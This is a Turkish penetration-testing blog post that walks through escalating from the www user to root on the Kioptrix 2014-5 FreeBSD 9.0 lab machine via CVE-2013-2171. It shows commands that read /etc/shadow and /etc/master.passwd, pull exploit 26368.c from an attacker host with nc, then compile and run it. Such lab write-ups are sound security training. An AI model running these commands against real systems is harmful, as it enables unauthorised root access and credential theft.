FreeBSD 9.0 İşletim Sistemindeki Hak Yükseltme Zafiyetinin (mmap/ptrace) İstismar Edilmesi

0
236
views
Linux sızma testleri sırasında standart haklar ile erişim sağlanabilmiş bir bilgisayarda, hak yükseltilerek yönetici hakları elde edilmeye çalışılır. Hak yükseltmek için kullanılan yöntemlerden birisi de işletim sistemindeki zafiyetlerin istismar edilmesidir. Bu yazıda, FreeBSD 9.0 işletim sistemine sahip Kioptrix: Seviye – 1.4 (#5) sanal makinesi üzerinde çalışan bir zafiyet (CVE-2013-2171) istismar edilerek standart kullanıcı haklarından “root” kullanıcısı hakkı ile komut satırı / kabuk elde edilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Yazıda kullanılan Kioptrix: Seviye – 1.4 (#5) sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/kioptrix_2014-5,62/

Linux işletim sistemine standart yetkilerle elde edilen erişimde uygulama kullanıcısı (www) haklarına sahip olunduğu görülmektedir.

id
head -3 /etc/passwd
head -3 /etc/shadow

 

İşletim sisteminin sürüm bilgilerine bakıldığında FreeBSD 9.0 olduğu görülmektedir.

uname -a
grep -Ev “^#” /usr/src/sys/conf/newvers.sh | head -5

 

FreeBSD 9.0’da bir takım zafiyetler bulunmaktadır. Bu zafiyetlerden birisi de CVE-2013-2171 ile kimliklendirilen “FreeBSD 9.0 < 9.1 mmap/ptrace – Privilege Escalation” zafiyetidir.

searchsploit FreeBSD 9.0 | grep -v “/dos/”

 

Zafiyete ait istismar kodu C dili ile yazılmıştır. 26368.c istismar kodunun transferi için bir yöntem olarak web servisi başlatılmıştır. Ancak kurban işletim sisteminde “wget” ve “curl” gibi araçlar olmadığı için “nc” aracı ile bu dosya aktarılmıştır.

cp /usr/share/exploitdb/platforms/freebsd/local/26368.c .
nc -nlvp 3333 < 26368.c

wget
curl
nc 172.20.50.128 3333 > /tmp/HakYukseltme.c
ls -la /tmp/

 

Aktarılan istismar kodu derlenir.

cd /tmp
gcc -o Yukselt HakYukseltme.c
ls -la Yukselt

 

Sonrasında çalıştırılır ve “root” yetkilerine erişim sağlanılmış olur.

./Yukselt
id
head -5 /etc/master.passwd

 

Kaynak:

https://www.doyler.net/security-not-included/kioptrix-2014-5-walkthrough
http://theevilbit.blogspot.com.tr/2014/05/kioptrix-2014-walktrough.html

 

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.